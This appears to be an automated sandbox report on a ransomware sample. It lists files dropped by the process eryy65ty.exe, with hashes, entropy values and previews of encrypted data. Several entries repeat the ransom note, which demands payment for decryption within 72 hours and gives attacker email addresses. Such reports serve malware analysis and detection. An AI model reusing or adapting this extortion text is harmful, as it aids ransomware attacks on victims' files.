                                                                                                    Preview:.Xy.Z..OW.H..8....Mb,s4.<...".V.l.$+95..u.{t........j.N.X.H...x'.6k..(yz.SY|.UO.ya..O...}.f-.#&.FX]....N|3...H,..3...X...m......(m6....S;.-..vQv.l....]...y...=.D...#g...-..h....yx..z`...$.K.v...a..!u.X..M4..t....K.&5..~..U....[.."`.Xcr..[..M.....V...V....OO...F@...Ko.6.RB7G.........p.I.}I..h.)._-...Wl#....U}9T.i;......9E.......,.....S!.Nn.)..s|5.W.<.?.?....}~PH.`.......yr=......n.'c..4xH..d....lqA|3>s........3.5.?..T.....a.kt....7...?.Lq8|.w6.......u:..>..s....Z..r.....9*2.M....d..\.E.r.^.....5p..v.u.p...!.....5.......A.....~...v>....0)f...F.3.!..&....~.(9..}.pV.T.F-..."#w4=........Tw.....r..{..Y....pv.h.....6/..#&...f......q....".<....5!.0.U..X...;=c.*.s..H|^..gQ;......Z )..}...p.......o....Ai.;.........h.2(....).P.X2.TX....Z_[/B.. ..RY.M......p.P.I.#....0._.crN...#.vo.h.S.C...8(.6....i..wKw4......y...N*x....0.W.q..GR.5.u2.X...3...=...wn -.._......,..p..,.....Do..:.m>..l..6...\D=.....(.X#.x.m....NKgm.p.+....x=.6...eG..T..r
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1290
                                                                                                    Entropy (8bit):7.851457976329037
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:295q8+dddO0inAfVrKf+UfrSTTUeGG2vK/KW7H/G8pwVi5GHciEW3NVeHH:2vqlddO0kkrKrOEeSIKW7XSuIdVEH
                                                                                                    MD5:B462007F0A22E250BB84C4DB2E15C1FD
                                                                                                    SHA1:2DA892BC7C47F4EACF76F37A19760D03DFF8771C
                                                                                                    SHA-256:07A5666D969BB9986B96A9C2AE6E7C4390DA149B4B40479F501A951CA4654034
                                                                                                    SHA-512:A7808453E72A7050A5764F6ECA5A7FD4A50EB90B865B84AB116BDA668A4B9114906FC039E8843AC64161A738ED12AA0DD5FCC1296A308F826A3E6AE9AC2923D0
                                                                                                    Malicious:false
                                                                                                    Preview:N.pBG.%.(..$d.WD..c#.K(....>w.E.....AE..U...=...:...\E.0.0./.y6.x.E-.....@..g.t`..@..p...i.t..ok... s.8..~........zI.......!F..M.6......w{[.._.......Q...eF...Ow`}.:#Z.QnP......n.Y..1.....q...{u.[..1b.....M.......C;.L.Z%.[.i%.[...:.tP.*.1......7...u.../.j:...%l=...}..w.9....7....{[.LD.....S.. .!B^`....<!..,...Ic...f.....%).3.Y..<\...rp?.i...}u.Rj...Q.k....I<...L.5Od..+J.&....q...\.....x^.S..g...W..".YM.....\(.yG..kK...]UiC..)..xQ...8ha...a.d..G......b..y.........Bx...1R...&..O..T}................i...iq.e..L*...4B..c.m..u...d%t...z....&...h.bO.4...p#..2e.\CG..q.>)R.5.=EVz....`..,.w6..$...<.2.....lG.r..I...i._....B#T..H...c.+K.X.....:.t..66......G0.#h..O~4.....xTr.q./.K....C...cq..`..-.B>.s9.0Z1.......#....q...+mQ.........!5*.z.piy..?dy.f.Y.....=.+#T...v.|q.mn...N.&..!.F..sZ..V.c..NG......a.\..-.....8.....z...j...^..R...6.p... ...?..%..p...D*K*..;.L]...F.X.......IE....[o.....N..5.......>.....^.....&...I...L4).%..w.S....L.BJG....r..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1290
                                                                                                    Entropy (8bit):7.851457976329037
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:295q8+dddO0inAfVrKf+UfrSTTUeGG2vK/KW7H/G8pwVi5GHciEW3NVeHH:2vqlddO0kkrKrOEeSIKW7XSuIdVEH
                                                                                                    MD5:B462007F0A22E250BB84C4DB2E15C1FD
                                                                                                    SHA1:2DA892BC7C47F4EACF76F37A19760D03DFF8771C
                                                                                                    SHA-256:07A5666D969BB9986B96A9C2AE6E7C4390DA149B4B40479F501A951CA4654034
                                                                                                    SHA-512:A7808453E72A7050A5764F6ECA5A7FD4A50EB90B865B84AB116BDA668A4B9114906FC039E8843AC64161A738ED12AA0DD5FCC1296A308F826A3E6AE9AC2923D0
                                                                                                    Malicious:false
                                                                                                    Preview:N.pBG.%.(..$d.WD..c#.K(....>w.E.....AE..U...=...:...\E.0.0./.y6.x.E-.....@..g.t`..@..p...i.t..ok... s.8..~........zI.......!F..M.6......w{[.._.......Q...eF...Ow`}.:#Z.QnP......n.Y..1.....q...{u.[..1b.....M.......C;.L.Z%.[.i%.[...:.tP.*.1......7...u.../.j:...%l=...}..w.9....7....{[.LD.....S.. .!B^`....<!..,...Ic...f.....%).3.Y..<\...rp?.i...}u.Rj...Q.k....I<...L.5Od..+J.&....q...\.....x^.S..g...W..".YM.....\(.yG..kK...]UiC..)..xQ...8ha...a.d..G......b..y.........Bx...1R...&..O..T}................i...iq.e..L*...4B..c.m..u...d%t...z....&...h.bO.4...p#..2e.\CG..q.>)R.5.=EVz....`..,.w6..$...<.2.....lG.r..I...i._....B#T..H...c.+K.X.....:.t..66......G0.#h..O~4.....xTr.q./.K....C...cq..`..-.B>.s9.0Z1.......#....q...+mQ.........!5*.z.piy..?dy.f.Y.....=.+#T...v.|q.mn...N.&..!.F..sZ..V.c..NG......a.\..-.....8.....z...j...^..R...6.p... ...?..%..p...D*K*..;.L]...F.X.......IE....[o.....N..5.......>.....^.....&...I...L4).%..w.S....L.BJG....r..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2348
                                                                                                    Entropy (8bit):7.919487531616361
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/OGVb3WGbmp+h9dHKEiZBVtcmzxSAkBQklbnvCpmvk36e7Xyd8NMmeOhgE:WGVS5K9dqn5IvBfCAu6H8NoO7
                                                                                                    MD5:0670A43FA398F2956955BB68505D06AE
                                                                                                    SHA1:38045EE18388C11A49E6E5C4E8916E7BADED7508
                                                                                                    SHA-256:2C4FFF96C396370C49866DF00FF978038B817580C2475BA78C36C6FEA63B2238
                                                                                                    SHA-512:342A31D68289094E0EB30BF02A27BD17317BA0273CD30287D3708E26BADBEB6BB08A4DC463888769E8FEEA9C37FBC7D3B8E1A1DC3D2A02BB5B8B40BA7F0436F8
                                                                                                    Malicious:false
                                                                                                    Preview:;E..tW.]b..qxW@.Z...m...*gmw.I.@QXY...!;,..p5....).)....0...(.=3..l.....*hTf..Q.....T.......O*&....X..r..`.Q..}.l...<.....JP...p...v/3.Q.../..9.|......s.E....L7..e....x..B.aVH*G.mo..Xg....$.C.F..G.* .1...<.;......cb.7.......i....T..)[......7..`...=.7.~4.N..{.T...OB45aVs.A.q..!.R...U;'_......I.....'.*K...f...}XHl~....U.0.=..J...1.Q.9..m.3S7 P..q.].5......y%A....p7.7.J..!R.DW..,.#PZ...>5....2.1....C.C.t.............B..&f..../..q.iV..s+.N...7..Tu.....V[....d,[|o.P^. 7../}...^..y...C.N%/.).,`..!.`_d.l....;.<e...x..A...uD\...y..9..g.<..p.p.[_....._.-....r..}b.@..|L.B..../Z.O.a.s..bi..r....f.....q......r.....;.i......~..i...+.H_.....L.B.......S...+.R\1V.e....C"..a..xCR.....e..#.x......5E+qN.b..o...Jb.h..,.U........8^N*&....x.@.@.").L.z.93....2.>Y.3....G..eZU...0..!..3......~N..O,..}.v..CX....{..5.S-[2@.ssP.4.....9x.6..,i{....._kr]2...C. g.?....;........t.A....i.7..../{.....1=.U)...'..*.j.j.8.)..'e.?3Qu?..>.f...mZ.g.?.#.6%!...?.Bk...g...0I..d.-T-...A,.P..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2348
                                                                                                    Entropy (8bit):7.919487531616361
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/OGVb3WGbmp+h9dHKEiZBVtcmzxSAkBQklbnvCpmvk36e7Xyd8NMmeOhgE:WGVS5K9dqn5IvBfCAu6H8NoO7
                                                                                                    MD5:0670A43FA398F2956955BB68505D06AE
                                                                                                    SHA1:38045EE18388C11A49E6E5C4E8916E7BADED7508
                                                                                                    SHA-256:2C4FFF96C396370C49866DF00FF978038B817580C2475BA78C36C6FEA63B2238
                                                                                                    SHA-512:342A31D68289094E0EB30BF02A27BD17317BA0273CD30287D3708E26BADBEB6BB08A4DC463888769E8FEEA9C37FBC7D3B8E1A1DC3D2A02BB5B8B40BA7F0436F8
                                                                                                    Malicious:false
                                                                                                    Preview:;E..tW.]b..qxW@.Z...m...*gmw.I.@QXY...!;,..p5....).)....0...(.=3..l.....*hTf..Q.....T.......O*&....X..r..`.Q..}.l...<.....JP...p...v/3.Q.../..9.|......s.E....L7..e....x..B.aVH*G.mo..Xg....$.C.F..G.* .1...<.;......cb.7.......i....T..)[......7..`...=.7.~4.N..{.T...OB45aVs.A.q..!.R...U;'_......I.....'.*K...f...}XHl~....U.0.=..J...1.Q.9..m.3S7 P..q.].5......y%A....p7.7.J..!R.DW..,.#PZ...>5....2.1....C.C.t.............B..&f..../..q.iV..s+.N...7..Tu.....V[....d,[|o.P^. 7../}...^..y...C.N%/.).,`..!.`_d.l....;.<e...x..A...uD\...y..9..g.<..p.p.[_....._.-....r..}b.@..|L.B..../Z.O.a.s..bi..r....f.....q......r.....;.i......~..i...+.H_.....L.B.......S...+.R\1V.e....C"..a..xCR.....e..#.x......5E+qN.b..o...Jb.h..,.U........8^N*&....x.@.@.").L.z.93....2.>Y.3....G..eZU...0..!..3......~N..O,..}.v..CX....{..5.S-[2@.ssP.4.....9x.6..,i{....._kr]2...C. g.?....;........t.A....i.7..../{.....1=.U)...'..*.j.j.8.)..'e.?3Qu?..>.f...mZ.g.?.#.6%!...?.Bk...g...0I..d.-T-...A,.P..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1802
                                                                                                    Entropy (8bit):7.8845992812091845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/NjWl1MWxWNtOyVrDq4JR+y82DYSK1pL47/aS:/UrvxWbOb4JMFH7s+S
                                                                                                    MD5:E9BF9FE1419F0540FE191FBE786FC32C
                                                                                                    SHA1:D2D482680E28EF501FCB03E6423FE65E4042D4CA
                                                                                                    SHA-256:D1DD22FBF3A7D4F78D597322B571153F19E9BE340BBF0C1BB1CCDD65B58DB4AD
                                                                                                    SHA-512:9B33BC941F1FD601FFC417C302B6A18FCAF79F52B0660299FC0B051BD31C5EC263D0A351D90636FCEEA96170657634BD747C7723F7DD806DB4ED3FE2427337C4
                                                                                                    Malicious:false
                                                                                                    Preview:....C.c......f)..."Y:....n:..J.i4..'.kR.E.6#.b.F.|..4Kc,f..i.4Lu@...52.... s..<.h.$Q...D...*..^..L.5..A.'..aG.7 ..y.......[...).JG9...9.$..K.!...?&%....X.H.....5....<SF.X.x#.e..S.l(jp..t..|Sr..C.ni..&6.V....R........-.nl.8...$k.Si..k..i...4.pai.....j..lo...r..>.....k...%f?.. ...}4. $*P...@g#...'ij.....f..=.N....a._m$>..:.ay!P..f.g.`.7vLO.d9...K...g......P.zB..;...j!...W....T3.J)*m{B.~k1.........2.W@?......UL.......BJv}{#W.~O...mu..Cz.R[@zq.......Q........b...]....$EJ..a.=,.^....4...#>U .S.y#...f.9..y.E'..(jyg."..1e.........3...Ji<.A.k.....,.H#...5^Q...p...~.mJr...\.z..K..z.Z....c..o..Ma.z.q..a...d.T.mi..3Y... N3+U!5.Po...hE.r..C..6+...nv.%P.3.2.]....1.........H...3h..@...FE.T..;..(.......\og..z.\.EK...7.9.X.......id6.0.8D./P.k.a..........7d6....=..>...SN$..QX.Go...U..4..9.].../... ......j..pz..N.n...ky......0.q...?......)Fv[;...b.[.QC(..... .#...R.X..Y....O..&...~.....GfH.../..#....Lf".3H.CQ+'...V.=....4..[.N.t3..T...q..M.....U0.Jr.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1802
                                                                                                    Entropy (8bit):7.8845992812091845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/NjWl1MWxWNtOyVrDq4JR+y82DYSK1pL47/aS:/UrvxWbOb4JMFH7s+S
                                                                                                    MD5:E9BF9FE1419F0540FE191FBE786FC32C
                                                                                                    SHA1:D2D482680E28EF501FCB03E6423FE65E4042D4CA
                                                                                                    SHA-256:D1DD22FBF3A7D4F78D597322B571153F19E9BE340BBF0C1BB1CCDD65B58DB4AD
                                                                                                    SHA-512:9B33BC941F1FD601FFC417C302B6A18FCAF79F52B0660299FC0B051BD31C5EC263D0A351D90636FCEEA96170657634BD747C7723F7DD806DB4ED3FE2427337C4
                                                                                                    Malicious:false
                                                                                                    Preview:....C.c......f)..."Y:....n:..J.i4..'.kR.E.6#.b.F.|..4Kc,f..i.4Lu@...52.... s..<.h.$Q...D...*..^..L.5..A.'..aG.7 ..y.......[...).JG9...9.$..K.!...?&%....X.H.....5....<SF.X.x#.e..S.l(jp..t..|Sr..C.ni..&6.V....R........-.nl.8...$k.Si..k..i...4.pai.....j..lo...r..>.....k...%f?.. ...}4. $*P...@g#...'ij.....f..=.N....a._m$>..:.ay!P..f.g.`.7vLO.d9...K...g......P.zB..;...j!...W....T3.J)*m{B.~k1.........2.W@?......UL.......BJv}{#W.~O...mu..Cz.R[@zq.......Q........b...]....$EJ..a.=,.^....4...#>U .S.y#...f.9..y.E'..(jyg."..1e.........3...Ji<.A.k.....,.H#...5^Q...p...~.mJr...\.z..K..z.Z....c..o..Ma.z.q..a...d.T.mi..3Y... N3+U!5.Po...hE.r..C..6+...nv.%P.3.2.]....1.........H...3h..@...FE.T..;..(.......\og..z.\.EK...7.9.X.......id6.0.8D./P.k.a..........7d6....=..>...SN$..QX.Go...U..4..9.].../... ......j..pz..N.n...ky......0.q...?......)Fv[;...b.[.QC(..... .#...R.X..Y....O..&...~.....GfH.../..#....Lf".3H.CQ+'...V.=....4..[.N.t3..T...q..M.....U0.Jr.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5898
                                                                                                    Entropy (8bit):7.443348663077553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RpjoPBMSah7pL+8/D55nKtHWk3jPMnnkIJxl1qUxqluzP5rh4QCGdREzAZiQ1:RGPGF7pL+8/D55nal3jgd1qU0luRh4Q1
                                                                                                    MD5:CBFCBDEBED36665661A7831775A8A580
                                                                                                    SHA1:3C09332FAB701393ED858709A533ACF241F34AF8
                                                                                                    SHA-256:551AF9209B83B3F5BC7849E089FB5AC531AA48FAC6054C31EB1E0AB1E66372CA
                                                                                                    SHA-512:724EE7D40117261207189DE50461F8250C73390315213751B551E82032280CA4240810A6D0C636E97599E9F7286062EDFA71766223047BFFD2267D2EC1328FA2
                                                                                                    Malicious:false
                                                                                                    Preview:..|9K.{.....f.......u.y.....T.fy..vx..gr.... .Oq*.3.....J..;m"YH.....d.#kC."......,}....H\i>.A...,.~.....k..d.......:..j.}....".y......1..KQV4..x....(.+.-...k:..G...>..%#?.-.....M....w..4~./.(Qp..;...."e.#^...,...yI...?LO.@....M..QD...+....U.m. ..*.q]F.....p...1..q...[S.bLj..._ep7.7.....d.E~`.].........;.....H.TWJ.{.3.....n.=`>../...=Y.T.b."..'.U......>.F.q.).........^....)<lZ.....dj.e...6...o.t.V.. ..w.).Q6.7...x...i.*....Y&...+.Q:...J.....].U8.@n._J6...w....{.(..j.8........UrS0.h..z.".ZcG.=.........+".2.Z.D..;.....s.jc?..`..<TSi...* .Wdv..Sx..#5..D.{00.OP+.bnw:4.....s.i.m..i......L."q.u.......s?.~.-DtI.....W.;.../...E....ZP>..*.$....HH.....j]Ue..E*n...[ .n[.g..M7.M.}...n..Ve2..I...r...S-..v.....HR...{.|.Koa.n..2.P.0F....!.. ..`..n...8]2.r .........I.`#....+5....xN...|.o5...H...t.[O...M..&.v.9*. .um..Q..FM.E.M.*.=.%,..D.8.0<J.1..'...B+\.W.......h..u^......e.&Q.*.k..D....9..+..qzMB..<f..........Z../..E.j%30D.N.;....o-o..t.}\.w....=l0...L..m...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5898
                                                                                                    Entropy (8bit):7.443348663077553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RpjoPBMSah7pL+8/D55nKtHWk3jPMnnkIJxl1qUxqluzP5rh4QCGdREzAZiQ1:RGPGF7pL+8/D55nal3jgd1qU0luRh4Q1
                                                                                                    MD5:CBFCBDEBED36665661A7831775A8A580
                                                                                                    SHA1:3C09332FAB701393ED858709A533ACF241F34AF8
                                                                                                    SHA-256:551AF9209B83B3F5BC7849E089FB5AC531AA48FAC6054C31EB1E0AB1E66372CA
                                                                                                    SHA-512:724EE7D40117261207189DE50461F8250C73390315213751B551E82032280CA4240810A6D0C636E97599E9F7286062EDFA71766223047BFFD2267D2EC1328FA2
                                                                                                    Malicious:false
                                                                                                    Preview:..|9K.{.....f.......u.y.....T.fy..vx..gr.... .Oq*.3.....J..;m"YH.....d.#kC."......,}....H\i>.A...,.~.....k..d.......:..j.}....".y......1..KQV4..x....(.+.-...k:..G...>..%#?.-.....M....w..4~./.(Qp..;...."e.#^...,...yI...?LO.@....M..QD...+....U.m. ..*.q]F.....p...1..q...[S.bLj..._ep7.7.....d.E~`.].........;.....H.TWJ.{.3.....n.=`>../...=Y.T.b."..'.U......>.F.q.).........^....)<lZ.....dj.e...6...o.t.V.. ..w.).Q6.7...x...i.*....Y&...+.Q:...J.....].U8.@n._J6...w....{.(..j.8........UrS0.h..z.".ZcG.=.........+".2.Z.D..;.....s.jc?..`..<TSi...* .Wdv..Sx..#5..D.{00.OP+.bnw:4.....s.i.m..i......L."q.u.......s?.~.-DtI.....W.;.../...E....ZP>..*.$....HH.....j]Ue..E*n...[ .n[.g..M7.M.}...n..Ve2..I...r...S-..v.....HR...{.|.Koa.n..2.P.0F....!.. ..`..n...8]2.r .........I.`#....+5....xN...|.o5...H...t.[O...M..&.v.9*. .um..Q..FM.E.M.*.=.%,..D.8.0<J.1..'...B+\.W.......h..u^......e.&Q.*.k..D....9..+..qzMB..<f..........Z../..E.j%30D.N.;....o-o..t.}\.w....=l0...L..m...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5898
                                                                                                    Entropy (8bit):7.443348663077553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RpjoPBMSah7pL+8/D55nKtHWk3jPMnnkIJxl1qUxqluzP5rh4QCGdREzAZiQ1:RGPGF7pL+8/D55nal3jgd1qU0luRh4Q1
                                                                                                    MD5:CBFCBDEBED36665661A7831775A8A580
                                                                                                    SHA1:3C09332FAB701393ED858709A533ACF241F34AF8
                                                                                                    SHA-256:551AF9209B83B3F5BC7849E089FB5AC531AA48FAC6054C31EB1E0AB1E66372CA
                                                                                                    SHA-512:724EE7D40117261207189DE50461F8250C73390315213751B551E82032280CA4240810A6D0C636E97599E9F7286062EDFA71766223047BFFD2267D2EC1328FA2
                                                                                                    Malicious:false
                                                                                                    Preview:..|9K.{.....f.......u.y.....T.fy..vx..gr.... .Oq*.3.....J..;m"YH.....d.#kC."......,}....H\i>.A...,.~.....k..d.......:..j.}....".y......1..KQV4..x....(.+.-...k:..G...>..%#?.-.....M....w..4~./.(Qp..;...."e.#^...,...yI...?LO.@....M..QD...+....U.m. ..*.q]F.....p...1..q...[S.bLj..._ep7.7.....d.E~`.].........;.....H.TWJ.{.3.....n.=`>../...=Y.T.b."..'.U......>.F.q.).........^....)<lZ.....dj.e...6...o.t.V.. ..w.).Q6.7...x...i.*....Y&...+.Q:...J.....].U8.@n._J6...w....{.(..j.8........UrS0.h..z.".ZcG.=.........+".2.Z.D..;.....s.jc?..`..<TSi...* .Wdv..Sx..#5..D.{00.OP+.bnw:4.....s.i.m..i......L."q.u.......s?.~.-DtI.....W.;.../...E....ZP>..*.$....HH.....j]Ue..E*n...[ .n[.g..M7.M.}...n..Ve2..I...r...S-..v.....HR...{.|.Koa.n..2.P.0F....!.. ..`..n...8]2.r .........I.`#....+5....xN...|.o5...H...t.[O...M..&.v.9*. .um..Q..FM.E.M.*.=.%,..D.8.0<J.1..'...B+\.W.......h..u^......e.&Q.*.k..D....9..+..qzMB..<f..........Z../..E.j%30D.N.;....o-o..t.}\.w....=l0...L..m...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
